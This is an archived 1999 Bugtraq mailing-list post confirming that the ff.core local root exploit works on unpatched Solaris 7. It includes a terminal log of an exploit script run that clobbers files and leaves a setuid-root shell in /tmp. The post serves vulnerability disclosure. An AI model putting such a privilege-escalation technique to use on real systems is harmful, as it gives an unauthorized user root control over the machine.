[9012] in bugtraq
ff.core exploit on Solaris (2.)7
daemon@ATHENA.MIT.EDU (Daniel J. Frasnelli)
Sat Jan 9 15:38:18 1999
Date: Fri, 8 Jan 1999 12:43:20 -0500
Reply-To: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
From: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
X-To: John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.4.05.9901070946310.11222-100000@osprey.unf.edu>

Greetings,
Confirmed ff.core exploit does exist in Solaris 7, server
edition. System is straight installation, no patches of any category
available for 7 from Sunsolve yet.

Daniel

(12:32,99-01-08)
(dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc
(12:34,99-01-08)
(dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x 1 root root 192764 Jan 8 12:32 /tmp/bob
# id
(snip) euid=0(root)